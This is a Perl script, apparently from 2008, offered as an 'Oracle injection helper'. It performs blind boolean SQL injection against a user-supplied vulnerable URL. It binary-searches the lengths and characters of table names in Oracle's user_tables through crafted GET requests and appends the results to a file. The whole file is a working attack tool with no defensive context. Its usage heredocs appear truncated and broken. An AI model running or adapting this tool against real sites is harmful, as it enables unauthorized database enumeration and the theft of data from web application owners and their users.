#!/usr/bin/perl -w
#Codz By N3tl04D
#2008-11-26
use strict;
use LWP;
my $browser;
my $start=time();
my $p;
my $word;
my $pass;
&usage if @ARGV!=4;
my $inject=$ARGV[0];
my $key_word=$ARGV[1];
my $start_table=$ARGV[2];
my $save_path=$ARGV[3];
&info;
sub do_GET {
$browser = LWP::UserAgent->new unless $browser;
my $resp = $browser->get(@_);
return ($resp->content, $resp->status_line, $resp->is_success, $resp)
if wantarray;
return unless $resp->is_success;
return $resp->content;
}
my $crack;
for (my $j=$start_table;$j<=300;$j++) {
print "正在测试第$j个表...\n";
cracklen($j,$word);
print "得到表长为$crack\n";
crack($j,$crack);
$crack=0;
}
sub cracklen {
my @dic=(32,16,8,4,2,1);
my $i=0;
my $op=1;
foreach my $pass(@dic)
{
$i++;
$crack+=$op*$pass;
print "大于$crack吗?";
my $url="$inject%20and%20(select%20%20length(table_name)%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=$_[0]%20order%20by%201%20desc)%20t%20where%20r%3E$_[0]-1%20order%20by%201)t)>".$crack."%20and%20'1'='1";
print $url;
my ($content, $status, $is_success) = do_GET($url);
if (!$is_success) {
print "网络有问题。等待30秒 $status\n";
sleep 30;
last;
} elsif ($content =~ m/$key_word/)
{
$op=1;
print " Y\n";
if($i==@dic)
{
$crack++;
}
}
else
{
print " N\n";
$op=-1;
}
}
return $crack;
}
my $end=time();
my $time=$end-$start;
print "用时".$time."秒\n";
sub crack {
my $word;
OUTER:for (my $i=1;$i<=$_[1];$i++) {
print "正在测试第$i位字母...\n";
my $p1=crackasc($i,$_[0]);
print "得到第$i位为$p1\n";
$word.=$p1;
}
print $word."\n";
save($_[0],$word,$_[1]);
}
sub crackasc {
my @dic=(64,32,16,8,4,2,1);
my $i=0;
my $op=1;
my $crack1;
foreach my $pass(@dic)
{
$i++;
$crack1+=$op*$pass;
print "大于$crack1吗?";
my $url="$inject%20and%20(select%20ascii(substr(table_name,".$_[0].",1))%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=".$_[1]."%20order%20by%201%20desc)%20t%20where%20r%3E".$_[1]."-1%20order%20by%201)t)>".$crack1."%20and%20'1'='1";
my ($content, $status, $is_success) = do_GET($url);
if (!$is_success) {
print "网络有问题。等待30秒 $status\n";
sleep 30;
$p=1;
return $p;
} elsif ($content =~ m/$key_word/)
{
$op=1;
print " Y\n";
if($i==@dic)
{
$crack1+=1;
$p=chr($crack1);
$crack1++;
return $p;
}
}
else
{
print " N\n";
$op=-1;
if($i==7)
{
$p=chr($crack1);
$crack1++;
return $p;
}
}
}
}
sub save {
open(FILE1,">>$save_path") || die ("Could not open file");
print FILE1 "\n第$_[0]个表长$_[2]名$_[1]";
close(FILE1);
}
sub usage {
print <
ORACLE注入辅助――猜表名
Codz By N3tl04D 2008-11-26
Syntax: $0 inject_point key_word start_table save_path
USAGE
exit 0
}
sub info {
print <
ORACLE注入辅助――猜表名
Codz By N3tl04D 2008-11-26
Syntax: $0 inject_point key_word start_table save_path
INFO
# exit 0
}